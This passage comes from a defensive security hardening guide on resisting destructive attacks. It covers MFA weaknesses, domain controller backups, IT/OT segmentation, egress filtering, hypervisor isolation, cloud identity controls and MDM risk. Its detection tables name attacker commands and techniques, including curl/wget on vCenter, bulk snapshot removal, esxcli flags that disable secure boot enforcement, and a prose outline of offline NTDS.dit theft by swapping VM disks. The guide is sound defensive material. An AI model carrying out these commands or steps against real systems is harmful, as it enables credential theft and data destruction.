External-facing assets that leverage single-factor authentication (SFA) are highly susceptible to brute-forcing attacks, password spraying, or unauthorized remote access using valid (stolen) credentials. External-facing applications and services that currently allow for SFA should be configured to support multi-factor authentication (MFA). Additionally, MFA should be leveraged for accessing not only on-premises external-facing managed infrastructure, but also for cloud-based resources (e.g., software-as-a-service [SaaS] such as Microsoft 365 [M365]). 

When configuring multifactor authentication, the following methods are commonly considered (and ranked from most to least secure):

  • Fast IDentity Online 2 (FIDO2)/WebAuthn security keys or passkeys

  • Software/hardware Open Authentication (OAUTH) token

  • Authenticator application (e.g., Duo/Microsoft [MS] Authenticator/Okta Verify)

  • Time-based One Time Password (TOTP)

  • Push notification (least preferred option) using number matching when possible

  • Phone call

  • Short Message Service (SMS) verification

  • Email-based verification

Risks of Specific MFA Methods

Push Notifications

If an organization is leveraging push notifications for MFA (e.g., a notification that requires acceptance via an application or automated call to a mobile device), threat actors can exploit this type of MFA configuration for attempted access, as a user may inadvertently accept a push notification on their device without the context of where the authentication was initiated. 

Phone/SMS Verification

If an organization is leveraging phone calls or SMS-based verification for MFA, these methods are not encrypted and are susceptible to potentially being intercepted by a threat actor. These methods are also vulnerable if a threat actor is able to transfer an employee's phone number to an attacker-controlled subscriber identification module (SIM) card. This would result in the MFA notifications being routed to the threat actor instead of the intended employee. 

Email-Based Verification

If an organization is leveraging email-based verification for validating access or for retrieving MFA codes, and a threat actor has already established the ability to access the email of their target, the actor could potentially also retrieve the email(s) to validate and complete the MFA process. 

If any of these MFA methods are leveraged, consider:

  • Training remote users to never accept or respond to a logon notification when they are not actively attempting to log in.

  • Establishing a method for users to report suspicious MFA notifications, as this could be indicative of a compromised account.

  • Ensuring there are messaging policies in place to prevent the auto-forwarding of email messages outside the organization.

Time-Based One-Time Password

Time-based one-time password (TOTP) relies on a shared secret, called a seed, known by both the authenticating system and the authenticator possessed by an end user. If a seed is compromised, the TOTP authenticator can be duplicated and used by a threat actor.

Detection Opportunities for External-Facing Assets and MFA Attempts

Use Case

MITRE ID

Description

Brute Force

T1110 – Brute Force

Search for a single user with an excessive number of failed logins from external Internet Protocol (IP) addresses. 

This risk can be mitigated by enforcing a strong password, MFA, and lockout policy.

Password Spray

T1110.003 – Password Spray

Search for a high number of accounts with failed logins, typically from the similar origination addresses.

Multiple Failed MFA Same User

T1110 – Brute Force

T1078 – Valid Accounts

Search for multiple failed MFA conditions for the same account. This may be indicative of a previously compromised credential.

Multiple Failed MFA Same Source

T1110.003 – Password Spray

T1078 – Valid Accounts

Search for multiple failed MFA prompts for different users from the same source. This may be indicative of multiple compromised credentials and an attempt to "spray" MFA prompts/tokens for access.

External Authentication from an Account with Elevated Privileges

T1078 – Valid Accounts

Privileged accounts should use internally managed and secured privileged access workstations for access and should not be accessible directly from an external (untrusted) source.

Adversary in the Middle (AiTM) Session Token Theft

T1557 - Adversary in the Middle

Monitor for sign-ins where the authentication method succeeds but the session originates from an IP/ASN inconsistent with the user's prior sessions. 

Detect logins from newly registered domains or known reverse-proxy infrastructure (EvilProxy, Tycoon 2FA). 

Correlate sign-in logs for "isInteractive: true" sessions with anomalous user-agent strings or geographically impossible travel.

MFA Fatigue / Prompt Bombing

T1621 - MFA Request Generation

Search for accounts receiving more than five MFA push notifications within a 10-minute window without a corresponding successful authentication. 

Post-Authentication MFA Device Registration

T1098.005 - Account Manipulation - Device Registration

Monitor audit logs for new MFA device registrations (AuthenticationMethodRegistered) occurring within 60 minutes of a sign-in from a new IP or device. Attackers who steal session tokens via AiTM immediately register their own MFA device for persistent access.

OAuth/Consent Phishing

T1550.001 - Use Alternate Authentication Material

Monitor for OAuth application consent grants with high-privilege scopes (Mail.Read, Files.ReadWrite.All) from unrecognized application IDs.

Table 3: Detection opportunities for external-facing assets and MFA attempts

2. Critical Asset Protections

Domain Controller and Critical Asset Backups

Organizations should verify that backups for domain controllers and critical assets are available and protected against unauthorized access or modification. Backup processes and procedures should be exercised on a continual basis. Backups should be protected and stored within secured enclaves that include both network and identity segmentation. 

If an organization's Active Directory (AD) were to become corrupted or unavailable due to ransomware or a potentially destructive attack, restoring Active Directory from domain controller backups may be the only viable option to reconstitute domain services. The following domain controller recovery and reconstitution best practices should be proactively reviewed by organizations: 

  • Verify that there is a known good backup of domain controllers and SYSVOL shares (e.g., from a domain controller – backup C:\Windows\SYSVOL).

    • For domain controllers, a system state backup is preferred. 

      Note: For a system state backup to occur, Windows Server Backup must be installed as a feature on a domain controller.

    • The following command can be run from an elevated command prompt to initiate a system state backup of a domain controller.

wbadmin start systemstatebackup -backuptarget:<targetDrive>:

Figure 1: Command to perform a system state backup

    • The following command can be run from an elevated command prompt to perform a SYSVOL backup. (Manage auditing and security log permissions must also be configured for the account performing the backup.)
robocopy c:\windows\sysvol c:\sysvol-backup /copyall /mir /b /r:0 /xd

Figure 2: Command to perform a SYSVOL backup

  • Proactively identify domain controllers that hold flexible single master operation (FSMO) roles, as these domain controllers will need to be prioritized for recovery in the event that a full domain restoration is required. 

netdom query fsmo

Figure 3: Command to identify domain controllers that hold FSMO roles

  • Offline backups: Ensure offline domain controller backups are secured and stored separately from online backups. 

  • Encryption: Backup data should be encrypted both during transit (over the wire) and when at rest or mirrored for offsite storage. 

  • DSRM Password validation: Ensure that the Directory Services Restore Mode (DSRM) password is set to a known value for each domain controller. This password is required when performing an authoritative or nonauthoritative domain controller restoration. 

  • Configure alerting for backup operations: Backup products and technologies should be configured to detect and provide alerting for operations critical to the availability and integrity of backup data (e.g., deletion of backup data, purging of backup metadata, restoration events, media errors). 

  • Enforce role-based access control (RBAC): Access to backup media and the applications that govern and manage data backups should use RBAC to restrict the scope of accounts that have access to the stored data and configuration parameters. 

  • Testing and verification: Both authoritative and nonauthoritative domain controller restoration processes should be documented and tested on a regular basis. The same testing and verification processes should be enforced for critical assets and data.

Business Continuity Planning

Critical asset recovery is dependent upon in-depth planning and preparation, which is often included within an organization's business continuity plan (BCP). Planning and recovery preparation should include the following core competencies:

  • A well-defined understanding of crown jewels data and supporting applications that align to backup, failover, and restoration tasks that prioritize mission-critical business operations

  • Clearly defined asset prioritization and recovery sequencing

  • Thoroughly documented recovery processes for critical systems and data

  • Trained personnel to support recovery efforts

  • Validation of recovery processes to ensure successful execution

  • Clear delineation of responsibility for managing and verifying data and application backups

  • Online and offline data backup retention policies, including initiation, frequency, verification, and testing (for both on-premises and cloud-based data)

  • Established service-level agreements (SLAs) with vendors to prioritize application and infrastructure-focused support

Continuity and recovery planning can become stale over time, and processes are often not updated to reflect environment and personnel changes. Prioritizing evaluations, continuous training, and recovery validation exercises will enable an organization to be better prepared in the event of a disaster.

Detection Opportunities for Backups

 

Use Case

MITRE ID

Description

Volume Shadow Deletion

T1490 – Inhibit System Recovery

Search for instances where a threat actor will delete volume shadow copies to inhibit system recovery. This can be accomplished using the command line, PowerShell, and other utilities.

Unauthorized Access Attempt

T1078 – Valid Accounts

Search for unauthorized users attempting to access the media and applications that are used to manage data backups.

Suspicious Usage of the DSRM Password

T1078 – Valid Accounts

Monitor security event logs on domain controllers for:

  • Event ID 4794 - An attempt was made to set the Directory Services Restore Mode administrator password

Monitoring the following registry key on domain controllers:

HKLM\System\CurrentControlSet\Control\Lsa\DSRMAdminLogonBehavior

Figure 4: DSRM registry key for monitoring

The possible values for the registry key noted in Figure 4 are:

  • 0 (default): The DSRM Administrator account can only be used if the domain controller is restarted in Directory Services Restore Mode.

  • 1: The DSRM Administrator account can be used for a console-based log on if the local Active Directory Domain Services service is stopped.

  • 2: The DSRM Administrator account can be used for console or network access without needing to reboot a domain controller.

Table 4: Detection opportunities for backups

IT and OT Segmentation

Organizations should ensure that there is both physical and logical segmentation between corporate information technology (IT) domains, identities, networks, and assets and those used in direct support of operational technology (OT) processes and control. By enforcing IT and OT segmentation, organizations can inhibit a threat actor's ability to pivot from corporate environments to mission-critical OT assets using compromised accounts and existing network access paths. 

OT environments should leverage separate identity stores (e.g., dedicated Active Directory domains), which are not trusted or cross-used in support of corporate identity and authentication. The compromise of a corporate identity or asset should not result in a threat actor's ability to directly pivot to accessing an asset that has the ability to influence an OT process.

In addition to separate AD forests being leveraged for IT and OT, segmentation should also include technologies that may have a dual use in the IT and OT environments (backup servers, antivirus [AV], endpoint detection and response [EDR], jump servers, storage, virtual network infrastructure). OT segmentation should be designed such that if there is a disruption in the corporate (IT) environment, the OT process can safely function independently, without a direct dependency (account, asset, network pathway) with the corporate infrastructure. For any dependencies that cannot be readily segmented, organizations should identify potential short-term processes or manual controls to ensure that the OT environment can be effectively isolated if evidence of an IT (corporate)-focused incident were detected. 

Segmenting IT and OT environments is a best practice recommended by industry standards such as the National Institute of Standards and Technology (NIST) SP 800-82r3: Guide to Operational Technology (OT) Security and IEC 62443 (formerly ISA99).

According to these best-practice standards, segmenting IT and OT networks should include the following:

  • OT attack surface reduction by restricting the scope of ports, services, and protocols that are directly accessible within the OT network from the corporate (IT) network.

  • Incoming access from corporate (IT) into OT must terminate within a segmented OT demilitarized zone (DMZ). The OT DMZ must require that a separate level of authentication and access be granted (outside of leveraging an account or endpoint that resides within the corporate IT domain). 

  • Explicit firewall rules should restrict both incoming traffic from the corporate environment and outgoing traffic from the OT environment.

  • Firewalls should be configured using the principle of deny by default, with only approved and authorized traffic flows permitted. Egress (internet) traffic flows for all assets that support OT should also follow the deny-by-default model.

  • Identity (account) segmentation must be enforced between corporate IT and OT. An account or endpoint within either environment should not have any permissions or access rights assigned outside of the respective environment. 

  • Remote access to the OT environment should not leverage similar accounts that have remote access permissions assigned within the corporate IT environment. MFA using separate credentials should be enforced for remotely accessing OT assets and resources.

  • Training and verification of manual control processes, including isolation and reliability verification for safety systems.

  • Secured enclaves for storing backups, programming logic, and logistical diagrams for systems and devices that comprise the OT infrastructure.

  • The default usernames and passwords associated with OT devices should always be changed from the default vendor configuration(s). 

Detection Opportunities for IT and OT Segmented Environments

Use Case

MITRE ID

Description

Network Service Scanning

T1046 – Network Service Scanning

Search for instances where a threat actor is performing internal network discovery to identify open ports and services between segmented environments.

Unauthorized Authentication Attempts Between Segmented Environments

T1078 – Valid Accounts

Search for failed logins for accounts limited to one environment attempting to log in within another environment. This can detect threat actors attempting to reuse credentials for lateral movement between networks.

Table 5: Detection opportunities for IT and OT segmented environments

Egress Restrictions

Servers and assets that are infrequently rebooted are highly targeted by threat actors for establishing backdoors to create persistent beacons to command-and-control (C2) infrastructure. By blocking or severely limiting internet access for these types of assets, an organization can effectively reduce the risk of a threat actor compromising servers, extracting data, or installing backdoors that leverage egress communications for maintaining access.

Egress restrictions should be enforced so that servers, internal network devices, critical IT assets, OT assets, and field devices cannot attempt to communicate to external sites and addresses (internet resources). The concept of deny by default should apply to all servers, network devices, and critical assets (including both IT and OT), with only allow-listed and authorized egress traffic flows explicitly defined and enforced. Where possible, this should include blocking recursive Domain Name System (DNS) resolutions not included in an allow-list to prevent communication via DNS tunneling.

If possible, egress traffic should be routed through an inspection layer (such as a proxy) to monitor external connections and block any connections to malicious domains or IP addresses. Connections to uncategorized network locations (e.g., a domain that has been recently registered) should not be permitted. Ideally, DNS requests would be routed through an external service (e.g., Cisco Umbrella, Infoblox DDI) to monitor for lookups to malicious domains. 

Threat actors often attempt to harvest credentials (including New Technology Local Area Network [LAN] Manager [NTLM] hashes) based upon outbound Server Message Block (SMB) or Web-based Distributed Authoring and Versioning (WebDAV) communications. Organizations should review and limit the scope of egress protocols that are permissible from any endpoint within the environment. While Hypertext Transfer Protocol (HTTP) (Transmission Control Protocol (TCP)/80) and HTTP Secure (HTTPS) (TCP/443) egress communications are likely required for many user-based endpoints, the scope of external sites and addresses can potentially be limited based upon web traffic-filtering technologies. Ideally, organizations should only permit egress protocols and communications based upon a predefined allow-list. Common high-risk ports for egress restrictions include:

  • File Transfer Protocol (FTP)

  • Remote Desktop Protocol (RDP)

  • Secure Shell (SSH)

  • Server Message Block (SMB)

  • Trivial File Transfer Protocol (TFTP) 

  • WebDAV

Detection Opportunities for Suspicious Egress Traffic Flows

Use Case

MITRE ID

Description

External Connection Attempt to a Known Malicious IP

TA0011 – Command and Control

Leverage threat feeds to identify attempted connections to known bad IP addresses.

External Communications from Servers, Critical Assets, and Isolated Network Segments

TA0011 – Command and Control

Search for egress traffic flows from subnets and addresses that correlate to servers, critical assets, OT segments, and field devices.

Outbound Connections Attempted Over SMB

T1212 – Exploitation for Credential Access

Search for external connection attempts over SMB, as this may be an attempt to harvest credential hashes.

Table 6: Detection opportunities for suspicious egress traffic flows

Virtualization Infrastructure Protections 

Threat actors often target virtualization infrastructure (e.g., VMware vSphere, Microsoft Hyper-V) as part of their reconnaissance, lateral movement, data theft, and potential ransomware deployment objectives. Securing virtualization infrastructure requires a Zero Trust network posture as a primary defense. Because management appliances often lack native MFA for local privileged accounts, identity-based security alone can be a high-risk single point of failure. If credentials are compromised, the logical network architecture becomes the final line of defense protecting the virtualization management plane.

To reduce the attack surface of virtualized infrastructure, a best practice for VMware vSphere vCenter ESXi and Hyper-V appliances and servers is to isolate and restrict access to the management interfaces, essentially enclaving these interfaces within isolated virtual local area networks (VLANs) (network segments) where connectivity is only permissible from dedicated subnets where administrative actions can be initiated.

To protect the virtualization control plane, organizations must consider a "defense-in-depth" network model. This architecture integrates physical isolation and east-west micro-segmentation to remove all access paths from untrusted networks. The result is a management zone that remains isolated and resilient, even during an active intrusion.

VMware vSphere Zero-Trust Network Architecture 

The primary goal is to ensure that even if privileged credentials are compromised, the logical network remains the definitive defensive layer preventing access to virtualization management interfaces.

  • Immutable VLAN Segmentation: Enforce strict isolation using distinct 802.1Q VLAN IDs for host management, Infrastructure/VCSA, vMotion (non-routable), Storage (non-routable), and production Guest VMs.

  • Virtual Routing and Forwarding (VRF): Transition all infrastructure VLANs into a dedicated VRF instance. This ensures that even a total compromise of the "User" or "Guest" zones results in no available route to the management zone(s).

Layer 3 and 4 Access Policies

The management network must be accessible only from trusted, hardened sources.

  • PAW-Exclusive Access: Deconstruct all direct routes from the general corporate LAN to management subnets. Access must originate strictly from a designated Privileged Access Workstation (PAW) subnet.

  • Ingress Filtering (Management Zone):

    • ALLOW: TCP/443 (UI/API) and TCP/902 (MKS) from the PAW subnet only.

    • DENY: Explicitly block SSH (TCP/22) and VAMI (TCP/5480) from all sources except the PAW subnet.

  • Restrictive Egress Policy: Enforce outbound filtering at the hardware gateway (as the VCSA GUI cannot manage egress). To prevent persistence using C2 traffic and data exfiltration, block all internet access except to specific, verified update servers (e.g., VMware Update Manager) and authorized identity providers.

Host-Based Firewall Enforcement

Complement network firewalls with host-level filtering to eliminate visibility gaps within the same VLAN.

  • VCSA (Photon OS): Transition the default policy to "Default Deny" via the VAMI or, preferably, at the OS level using iptables/nftables for granular source/destination mapping. 

  • ESXi Hypervisors: Restrict all services (SSH, Web Access, NFC/Storage) to specific management IPs by deselecting "Allow connections from any IP address."

Additional information related to VMware vSphere VCSA host based firewalls.

A listing of administrative ports associated with VMWare vCenter (that should be targeted for isolation).

Hyper-V Zero-Trust Network Architecture 

Similar to vSphere, Hyper-V requires strict isolation of its various traffic types to prevent lateral movement from guest workloads to the management plane.

  • VLAN Segmentation: Organizations must enforce isolation using distinct VLANs for Host Management, Live Migration, Cluster Heartbeat (CSV), and Production Guest VMs.

  • Non-Routable Networks: Traffic for Live Migration and Cluster Shared Volumes (CSV) should be placed on non-routable VLANs to ensure these high-bandwidth, sensitive streams cannot be intercepted from other segments.

Layer 3 and 4 Access Policies

The management network must be accessible only from trusted, hardened sources.

  • PAW-Exclusive Access: Deconstruct all direct routes from the general corporate LAN to management subnets. Access must originate strictly from a designated Privileged Access Workstation (PAW) subnet.

  • Ingress Filtering (Management Zone):

    • ALLOW: WinRM / PowerShell Remoting (TCP/5985 and TCP/5986), RDP (TCP/3389), and WMI/RPC (TCP/135 and dynamic RPC ports)strictly from the PAW subnet. If using Windows Admin Center, allow HTTPS (TCP/443) to the gateway.

    • DENY: Explicitly block SMB (TCP/445), RPC/WMI (TCP/135), and all other management traffic from untrusted sources to prevent credential theft and lateral movement.

  • Restrictive Egress Policy: Enforce outbound filtering at the network gateway. To prevent persistence using C2 traffic and data exfiltration, block all internet access from Hyper-V hosts except to specific, verified update servers (e.g., internal WSUS), authorized Active Directory Domain Controllers, and Key Management Servers (KMS).

Host-Based Firewall Enforcement

Use the Windows Firewall with Advanced Security (WFAS) to achieve a defense-in-depth posture at the host level.

  • Scope Restriction: For all enabled management rules (e.g., File and Printer Sharing, WMI, PowerShell Remoting), modify the Remote IP Address scope to "These IP addresses" and enter only the PAW and management server subnets.

  • Management Logging: Enable logging for Dropped Packets in the Windows Firewall profile. This allows the SIEM to ingest "denied" connection attempts, which serve as high-fidelity indicators of internal reconnaissance or unauthorized access attempts.

Additional information related to Hyper-V host based firewalls.

Additional information related to securing Hyper-V. 

General Virtualization Hardening 

To protect management interfaces for VMware vSphere the VMKernel network interface card (NIC) should not be bound to the same virtual network assigned to virtual machines running on the host. Additionally, ESXi servers can be configured in lockdown mode, which will only allow console access from the vCenter server(s). Additional information related to lockdown mode.

The SSH protocol (TCP/22) provides a common channel for accessing a physical virtualization server or appliance (vCenter) for administration and troubleshooting. Threat actors commonly leverage SSH for direct access to virtualization infrastructure to conduct destructive attacks. In addition to enclaving access to administrative interfaces, SSH access to virtualization infrastructure should be disabled and only enabled for specific use-cases. If SSH is required, network ACLs should be used to limit where connections can originate.

Identity segmentation should also be configured when accessing administrative interfaces associated with virtualization infrastructure. If Active Directory authentication provides direct integrated access to the physical virtualization stack, a threat actor that has compromised a valid Active Directory account (with permissions to manage the virtualization infrastructure) could potentially use the account to directly access virtualized systems to steal data or perform destructive actions.

Authentication to virtualized infrastructure should rely upon dedicated and unique accounts that are configured with strong passwords and that are not co-used for additional access within an environment. Additionally, accessing management interfaces associated with virtualization infrastructure should only be initiated from isolated privileged access workstations, which prevent the storing and caching of passwords used for accessing critical infrastructure components.

Protecting Hypervisors Against Offline Credential Theft and Exfiltration

Organizations should implement a proactive, defense-in-depth technical hardening strategy to systematically address security gaps and mitigate the risk of offline credential theft from the hypervisor layer. The core of this attack is an offline credential theft technique known as a "Disk Swap." Once an adversary has administrative control over the hypervisor (vSphere or Hyper-V), they perform the following steps:

  • Target Identification: The actor identifies a critical virtualized asset, such as a Domain Controller (DC) 

  • Offline Manipulation: The target VM is powered off, and its virtual disk file (e.g., .vmdk for VMware or .vhd/.vhdx for Hyper-V) is detached.

  • NTDS.dit Extraction: The disk is attached to a staging or "orphaned" VM under the attacker's control. From this unmonitored machine, they copy the NTDS.dit Active Directory database.

  • Stealthy Recovery: The disk is re-attached to the original DC, and the VM is powered back on, leaving minimal forensic evidence within the guest operating system.

Hardening and Mitigation Guidance

To defend against this logic, organizations must implement a defense-in-depth strategy that focuses on cryptographic isolation and strict lifecycle management.

  • Virtual Machine Encryption: Organizations must encrypt all Tier 0 virtualized assets (e.g., Domain Controllers, PKI, and Backup Servers). Encryption ensures that even if a virtual disk file is stolen or detached, it remains unreadable without access to the specific keys. 

  • Strict Decommissioning Processes: Do not leave powered-off or "orphaned" virtual machines on datastores. These "ghost" VMs are ideal staging environments for attackers. Formally decommission assets by deleting their virtual disks rather than just removing them from the inventory.

  • Harden Hypervisor Accounts: Disable or restrict default administrative accounts (such as root on ESXi or the local Administrator on Hyper-V hosts). Enforce Lockdown Mode (VMware ESXi feature) where possible to prevent direct host-level changes outside of the central management plane.

  • Remote Audit Logging: Enable and forward all hypervisor-level audit logs (e.g., hostd.log, vpxa.log, or Windows Event Logs for Hyper-V) to a centralized SIEM. 

Protecting Backups

Security measures must encompass both production and backup environments. An attack on the production plane is often coupled with a simultaneous focus on backup integrity, creating a total loss of operational continuity. Virtual disk files (VMDK for VMware and VHD/VHDX for Hyper-V) represent a high-value target for offline data theft and direct manipulation.

Hardening and Mitigation Guidance

To mitigate the risk of offline theft and backup manipulation, organizations must implement a "Default Encrypted" policy across the entire lifecycle of the virtual disk .

  • At-Rest Encryption for all Tier-0 Assets: Implement vSphere VM Encryption or Hyper-V Shielded VMs for all critical infrastructure (e.g., Domain Controllers, Certificate Authorities). This ensures that the raw VMDK or VHDX files are cryptographically protected, rendering them unreadable if detached or mounted by an unauthorized party.

  • Encrypted Backup Repositories: Ensure that the backup application is configured to encrypt backup data at rest using a unique key stored in a separate, hardened Key Management System (KMS). This prevents "direct manipulation" of the backup files even if the backup storage itself is compromised. 

  • Network Isolation of Storage & Backups: Isolate the storage management network and the backup infrastructure into dedicated, non-routable VLANs. Access to the backup console and repositories must require phishing-resistant MFA and originate from a designated Privileged Access Workstation (PAW).

  • Immutability and Air-Gapping: Use Immutable Backup Repositories to ensure that once a backup is written, it cannot be modified or deleted by any user including a compromised administrator for a set period. This provides a definitive recovery point in the event of a ransomware attack or intentional data sabotage.

Detection Opportunities for Monitoring Virtualization Infrastructure

Use Case

MITRE ID

Description

Unauthorized Access Attempt to Virtualized Infrastructure

T1078 – Valid Accounts

Search for attempted logins to virtualized infrastructure by unauthorized accounts.

Unauthorized SSH Connection Attempt

T1021.004 – Remote Services: SSH

Search for instances where an SSH connection is attempted when SSH has not been enabled for an approved purpose or is not expected from a specific origination asset.

ESXi Shell/SSH Enablement

T1059.004 - Command and Scripting Interpreter

Monitor ESXi hostd.log and shell.log for the SSH service being enabled via DCUI, vSphere client, or API calls. Alert on any ESXi SSH enablement event that was not preceded by an approved change request.

Bulk VM Power-Off Events

T1529 - System Shutdown/Reboot

Detect sequences where multiple VMs are powered off within a short time window (e.g., >5 VMs in 10 minutes) via vCenter events. 

Correlate with vpxd.log "ReceivedPowerOffVM" events.

VMDK File Access from Non-Standard Processes

T1486 - Data Encrypted for Impact

Monitor for processes accessing .vmdk, .vmx, .vmsd, or .vmsn files outside of normal VMware service processes (hostd, vpxd, fdm). 

execInstalledOnly Disablement

T1562.001 - Impair Defenses: Disable or Modify Tools

Monitor ESXi shell.log for execution of "esxcli system settings encryption set" with "--require-exec-installed-only=F" or "--require-secure-boot=F". Alert on any cryptographic enforcement disablement event that was not preceded by an approved change request.

vCenter SSO Identity Modification

T1556 - Modify Authentication Process

Monitor vCenter events and vpxd.log for modifications to SSO identity sources, including the addition of new LDAP providers or changes to vshphere.local administrator group membership. Alert on an identity source change not initiated from a designated PAW subnet.

VM Disk Detach and Reattach to Non-Inventory VM

T1486 - Data Encrypted for Impact

Detect sequences where a virtual disk is removed from a Tier-0 asset via "vim.event.VmReconfiguredEvent" and subsequently attached to an orphaned or non-standard inventory VM. 

Correlate with "vim.event.VmRegisteredEvent" events on non-standard datastore paths within the same time window.

VCSA Shell Command Anomaly

T1059.004 - Command and Scripting Interpreter: Unix Shell

Monitor VCSA shell audit logs for execution of high-risk commands (e.g., wget, curl, psql, certificate-manager) by any user following an interactive SSH session. Alert on any instance where these commands are executed outside of an approved change window.

Bulk Snapshot Deletion

T1490 - Inhibit System Recovery

Detects sequences where snapshots are removed across multiple VMs within a short time window via vCenter events. Correlate with "vim-cmd vmsvc/snapshot.removeall" execution in hostd.log to confirm host-level action.

Table 7: Detection opportunities for VMware vSphere

Protecting Against DDoS Attacks

A distributed denial-of-service (DDoS) attack is an example of a disruptive attack that could impact the availability of cloud-based resources and services. Modernized DDoS protection must extend beyond the legacy concepts of filtering and rate-limiting, and include cloud-native capabilities that can scale to combat adversarial capabilities.

In addition to third-party DDoS and web application access protection services, the following table provides an overview of DDoS protection capabilities within common cloud-based infrastructures.

Cloud Provider

DDoS Protection Capability 

Google Cloud

Google Cloud Armor

Amazon Web Services

AWS Shield

Microsoft Azure

Azure DDoS Protection

Cloud Platform Agnostic 

Imperva WAF

Akamai WAF

Cloudflare DDoS Protection

Table 8: Common cloud capabilities to mitigate DDoS attacks

Hardening the Cloud Perimeter 

With the hybrid operating model of modern day infrastructure, cloud consoles and SaaS platforms are high-value targets for credential harvesting and data exfiltration. Minimizing these risks requires a dual-defense strategy: robust identity controls to prevent unauthorized access, and platform-specific guardrails to protect access to resources, data, and to minimize the attack surface. 

Strong Authentication Enforcement

Strong authentication is the foundational requirement for cloud resilience and securing cloud infrastructure. Similar to on-premises environments, a compromise of a privileged credential, token, or session could lead to unintended consequences that result in a high-impact event for an organization. To mitigate these pervasive risks, organizations must unconditionally enforce strong authentication for all external-facing cloud services, administrative portals, and SaaS platforms. 

Organizations should enforce the usage of phishing-resistant authenticators such as FIDO2 (WebAuthn) hardware tokens or passkeys, or certificate based authentication for accounts assigned privileged roles and functions. For non-privileged users, authenticator software (Microsoft Authenticator or Okta Verify) should be configured to utilize device-bound factors such as Windows Hello for Business or TouchID.

Additionally, organizations should leverage the concept of authenticators (identity + device attestation) as part of the authentication transaction. This includes enforcing a validated-device access policy that restricts privileged access to only originate from managed, compliant, and healthy devices. Trusted network zones should be defined in order to restrict access to cloud resources from the open internet. Untrusted network zones should be defined to restrict authentication from anonymizing services such as VPNs or TOR. Using device-bound session credentials where possible mitigates the risk of session token theft.

Identity and Device Segmentation for Privileged Actions

The implementation of privileged access workstations (PAWs) is a critical defense against threat actors attempting to compromise administrative sessions. A PAW is a highly hardened, dedicated hardware endpoint used exclusively for sensitive administrative tasks.

Administrators should leverage a non-privileged account for daily tasks, while privileged actions are restricted to only being permissible from the hardened PAW, or from explicitly defined IP ranges. This "air-gap" between communication and administration prevents an adversary from moving laterally from a compromised non-privileged identity to a privileged context within hybrid environments. 

Just-in-Time Access and the Principle of Least Privilege

Static, standing privileges present a security risk in hybrid environments. Following a zero-trust cloud architecture, administrative privileges should be entirely ephemeral. Implementing Just-In-Time (JIT) and Just-Enough-Access (JEA) mechanisms ensures that administrators are granted only the specific, granular permissions necessary to perform a discrete task, and only for a highly limited duration, after which the permissions are automatically revoked. This architectural model provides organizations with the ability to enforce approvals for privileged actions, enhanced monitoring, and detailed visibility regarding any privileged actions taken within a specific session.

Securing Non-Human Identities

Organizations should implement identity governance practices that include processes to rotate API keys, certificates, service account secrets, tokens, and sessions on a predefined basis. AI agents or identities correlating to autonomous outcomes should be configured with strictly scoped permissions and associated monitoring. Non-privileged users should be restricted from authorizing third-party application integrations or creating API keys without organizational approval.

Continuous scanning should be performed to identify and remediate hard-coded secrets and sensitive credentials across all cloud and SaaS environments.

Storage Infrastructure Security and Immutable Backups

The strategic objective of a destructive cyberattack—whether for extortion or sabotage—is to prolong recovery and reconstitution efforts by ensuring data is irrecoverable. Modern adversaries systematically target the backup plane as part of a destructive event. If backups remain mutable or share an identity plane with the primary environment, attackers can delete or encrypt them, transforming an incident into a prolonged and chaotic recovery exercise.

While modern-day redundancy for backups should include multiple data copies across diverse media, geographic separation can be a subverted defensive strategy if logical access is unified. To ensure resilience against destructive attacks, the secondary recovery environment should reside within a sovereign cloud tenant or isolated subscription. This environment should be governed by an independent Identity and Access Management (IAM) plane, using distinct credentials and administrative personas that share no commonality with the production environment.

Backups within an isolated environment must be anchored by immutable storage architectures. By leveraging hardware-verified Write-Once, Read-Many (WORM) technology, the recovery plane ensures that data integrity is mathematically guaranteed. Once committed, data cannot be modified, encrypted, or deleted—even by accounts with root or global administrative privileges, until the retention period expires. This creates a definitive "fail-safe" that ensures a known-good recovery point remains accessible regardless of potential security risks in the primary environment.

Additional defense-in-depth security architecture controls relevant to common cloud-based infrastructures are included in Table 9.

Table 9: Common cloud capabilities for infrastructure hardening

Detection Opportunities for Protecting Cloud Infrastructure and Resources

Use Case

MITRE ID

Description

Cloud Account Abuse

T1078.004 - Valid Accounts: Cloud Accounts

Monitor cloud audit logs for authentication from unseen source IPs, anomalous ASNs, or impossible travel patterns. 

Alert on IAM policy modifications, new role assignments, and service account key creation by accounts without prior administrative API activity.

Lateral Movement via Cloud Interfaces

T1021.007 - Remote Services: Cloud Services

Detect interactive console sign-ins from IPs that previously only performed programmatic API/CLI access. Alert on cloud CLI execution from non-administrative endpoints. 

Monitor for cross-service lateral movement where a single identity authenticates to multiple cloud services in a compressed timeframe outside its historical access pattern.

Modify Cloud Compute Configurations

T1578.005 - Modify Cloud Compute Configurations

Monitor for unauthorized compute changes including bulk instance creation or deletion deviating from change management baselines. 

Alert on snapshot creation of production volumes by non-backup accounts, disk detach/reattach targeting domain controller or database instances for offline credential theft, and network/firewall modifications exposing internal services to public access.

Cloud Log Enumeration

T1654 - Log Enumeration

Monitor for API calls listing or accessing logging configurations from identities without documented operational need. 

Alert on enumeration of SIEM integration settings, log export destinations, and alert rule definitions.

Mass Deletion & Impact

T1490 - Inhibit System Recovery

Alert when bulk delete API calls exceed baseline thresholds targeting compute instances, storage, databases, or virtual networks. 

Detect deletion or retention reduction of recovery-critical resources including backup vaults, snapshot schedules, and disaster recovery configurations.

Backup Policy Modification or Deletion

T1490 - Inhibit System Recovery

Monitor for unauthorized modifications to backup configurations, including changes to WORM retention policies, backup vault access policies, snapshot deletion, or backup schedule disablement. 

Alert on backup storage account access from identities other than designated backup service accounts.

Conditional Access or Security Policy Modification

T1556.009 - Conditional Access Policies

Monitor cloud identity provider audit logs for modifications to Conditional Access Policies, MFA enforcement rules, legacy authentication blocking rules, or PIM/JIT role settings. Alert on changes that add location or device exclusions to MFA policies, disable legacy protocol blocks, extend privilege role activation durations, or register new authentication methods on privileged accounts.

Table 10: Detection opportunities for protecting cloud infrastructure and resources

Securing Endpoint and Mobile Device Management Platforms

Protecting endpoint and Mobile Device Management (MDM) platforms is crucial to ensuring the security and availability of devices used in support of operations. In the context of wiper and destructive-style attacks, these platforms represent the "keys to the kingdom" that threat actors can target to turn an organization’s own infrastructure against itself.

Force Multiplier: MDM and endpoint management tools have the inherent ability to push configurations and scripts to enrolled and managed devices. If compromised, a threat actor can use these legitimate administrative platforms to deploy wiper malware or execute remote wipe commands simultaneously across the entire enterprise, achieving destruction in minutes.  

